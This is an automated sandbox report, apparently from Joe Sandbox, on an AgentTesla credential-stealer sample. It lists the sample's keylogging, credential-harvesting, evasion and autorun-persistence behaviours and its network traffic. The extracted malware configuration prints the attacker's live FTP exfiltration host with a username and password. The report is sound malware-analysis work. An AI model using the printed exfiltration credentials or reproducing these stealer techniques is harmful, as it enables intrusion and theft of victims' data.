Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x4l3iVpFSc.exe

Overview

General Information

Sample name:x4l3iVpFSc.exe
renamed because original name is a hash value
Original sample name:184a555eb9e981564e4dd08321f466d1f643c6082d309a2acf6ede5add96c7cc.exe
Analysis ID:1632425
MD5:f34b45032d884d86f62b2a0331a1c9de
SHA1:48b550d96098933548a7787f4b8e96de25fc1bba
SHA256:184a555eb9e981564e4dd08321f466d1f643c6082d309a2acf6ede5add96c7cc
Tags:AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
Drops executable to a common third party application directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • x4l3iVpFSc.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\x4l3iVpFSc.exe" MD5: F34B45032D884D86F62B2A0331A1C9DE)
    • x4l3iVpFSc.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\x4l3iVpFSc.exe" MD5: F34B45032D884D86F62B2A0331A1C9DE)
  • adobe.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: F34B45032D884D86F62B2A0331A1C9DE)
    • adobe.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: F34B45032D884D86F62B2A0331A1C9DE)
  • adobe.exe (PID: 7832 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: F34B45032D884D86F62B2A0331A1C9DE)
    • adobe.exe (PID: 8148 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: F34B45032D884D86F62B2A0331A1C9DE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dod", "Password": "Doll900@@"}
SourceRuleDescriptionAuthorStrings
0000000A.00000002.1982245399.0000000002FED000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    0000000D.00000002.1985241633.0000000002AE7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000D.00000002.1985241633.0000000002AE7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000E.00000002.2441073998.0000000003017000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000E.00000002.2441073998.0000000003017000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 24 entries
            SourceRuleDescriptionAuthorStrings
            0.2.x4l3iVpFSc.exe.5630000.8.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.x4l3iVpFSc.exe.5630000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\adobe\adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x4l3iVpFSc.exe, ProcessId: 7508, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: x4l3iVpFSc.exeAvira: detected
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeAvira: detection malicious, Label: TR/AVI.PWS.Agent.hglxv
                Source: adobe.exe.8148.14.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dod", "Password": "Doll900@@"}
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeVirustotal: Detection: 63%Perma Link
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeReversingLabs: Detection: 60%
                Source: x4l3iVpFSc.exeVirustotal: Detection: 63%Perma Link
                Source: x4l3iVpFSc.exeReversingLabs: Detection: 60%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: x4l3iVpFSc.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49687 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49691 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49693 version: TLS 1.2
                Source: x4l3iVpFSc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: x4l3iVpFSc.exe, 00000000.00000002.1470767093.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, x4l3iVpFSc.exe, 00000000.00000002.1477309607.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, x4l3iVpFSc.exe, 00000000.00000002.1470767093.0000000003D72000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003953000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.2005831500.0000000003FC3000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: x4l3iVpFSc.exe, 00000000.00000002.1470767093.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, x4l3iVpFSc.exe, 00000000.00000002.1477309607.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, x4l3iVpFSc.exe, 00000000.00000002.1470767093.0000000003D72000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003953000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.2005831500.0000000003FC3000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 4x nop then jmp 05D45680h0_2_05D455C0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 4x nop then jmp 05D45680h0_2_05D455C8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4x nop then jmp 06275680h10_2_062755C0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4x nop then jmp 06275680h10_2_062755C8
                Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                Source: Joe Sandbox ViewIP Address: 213.189.52.181 213.189.52.181
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownFTP traffic detected: 213.189.52.181:21 -> 192.168.2.10:49688 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 23:37. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 23:37. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 23:37. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                Source: global trafficDNS traffic detected: DNS query: s4.serv00.com
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: adobe.exe.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://ocsp.digicert.com0
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: x4l3iVpFSc.exe, 00000008.00000002.2440123825.000000000338A000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000D.00000002.1985241633.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000E.00000002.2441073998.000000000304A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s4.serv00.com
                Source: x4l3iVpFSc.exe, 00000000.00000002.1460625473.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, x4l3iVpFSc.exe, 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1893124137.0000000002901000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.1982245399.0000000003045000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000E.00000002.2441073998.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: x4l3iVpFSc.exe, adobe.exe.8.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: x4l3iVpFSc.exe, 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                Source: x4l3iVpFSc.exe, 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000E.00000002.2441073998.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000E.00000002.2441073998.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: x4l3iVpFSc.exe, 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000E.00000002.2441073998.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: x4l3iVpFSc.exe, 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000E.00000002.2441073998.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                Source: x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: x4l3iVpFSc.exe, 00000000.00000002.1470767093.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.2005831500.000000000447C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: x4l3iVpFSc.exe, 00000000.00000002.1460625473.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1893124137.0000000002901000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.1982245399.0000000003045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
                Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49687 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49691 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49693 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_05D46E88 NtProtectVirtualMemory,0_2_05D46E88
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_05D4A8E0 NtResumeThread,0_2_05D4A8E0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_05D46E80 NtProtectVirtualMemory,0_2_05D46E80
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_05D4A8D8 NtResumeThread,0_2_05D4A8D8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_06276E88 NtProtectVirtualMemory,10_2_06276E88
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_0627A8E0 NtResumeThread,10_2_0627A8E0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_06276E81 NtProtectVirtualMemory,10_2_06276E81
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_0627A8D8 NtResumeThread,10_2_0627A8D8
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_0295AAF00_2_0295AAF0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_0295ECE80_2_0295ECE8
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_029519210_2_02951921
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_02951EF00_2_02951EF0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_0295AAE00_2_0295AAE0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_0295B3880_2_0295B388
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_0295B4800_2_0295B480
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_05D43AF00_2_05D43AF0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_05D43AE00_2_05D43AE0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_05D6F6180_2_05D6F618
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_05D6F3080_2_05D6F308
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_05D6DD800_2_05D6DD80
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_05D500400_2_05D50040
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 0_2_05D500060_2_05D50006
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_031493D88_2_031493D8
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_03146BF08_2_03146BF0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_0314A8408_2_0314A840
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_031458908_2_03145890
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_03149FF08_2_03149FF0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_0314CC588_2_0314CC58
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_0314D10F8_2_0314D10F
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_0314D0E58_2_0314D0E5
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_031497208_2_03149720
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_03142B488_2_03142B48
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_03146BE08_2_03146BE0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_03142ADE8_2_03142ADE
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_0314A8318_2_0314A831
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_031458628_2_03145862
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06EAF7688_2_06EAF768
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06EA5AF08_2_06EA5AF0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06EA63B88_2_06EA63B8
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06EA5AD98_2_06EA5AD9
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06EA63A88_2_06EA63A8
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE96B08_2_06FE96B0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE76088_2_06FE7608
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FED2888_2_06FED288
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FEAA588_2_06FEAA58
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE00408_2_06FE0040
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE21708_2_06FE2170
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FEEE908_2_06FEEE90
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FEAFF28_2_06FEAFF2
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FEBCC88_2_06FEBCC8
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE75FA8_2_06FE75FA
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE1D308_2_06FE1D30
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE1D208_2_06FE1D20
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE9AC88_2_06FE9AC8
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE9ABF8_2_06FE9ABF
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FED2788_2_06FED278
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE82588_2_06FE8258
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE82488_2_06FE8248
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FEAA498_2_06FEAA49
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FEA2288_2_06FEA228
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FEF2008_2_06FEF200
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE5BC98_2_06FE5BC9
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FEC3C08_2_06FEC3C0
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FEE3608_2_06FEE360
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FEE3508_2_06FEE350
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE8B108_2_06FE8B10
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE58708_2_06FE5870
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FEC8088_2_06FEC808
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE21608_2_06FE2160
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE51608_2_06FE5160
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE51508_2_06FE5150
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FEB9208_2_06FEB920
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00FFAAF09_2_00FFAAF0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00FFECE89_2_00FFECE8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00FF19249_2_00FF1924
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00FF1EF09_2_00FF1EF0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00FFAAE09_2_00FFAAE0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00FFB3889_2_00FFB388
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00FFB4809_2_00FFB480
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_02D5AAF010_2_02D5AAF0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_02D5ECE810_2_02D5ECE8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_02D5192310_2_02D51923
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_02D51EF010_2_02D51EF0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_02D5AAE010_2_02D5AAE0
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_02D5B38810_2_02D5B388
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_02D5B48010_2_02D5B480
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_062736E810_2_062736E8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_062736D810_2_062736D8
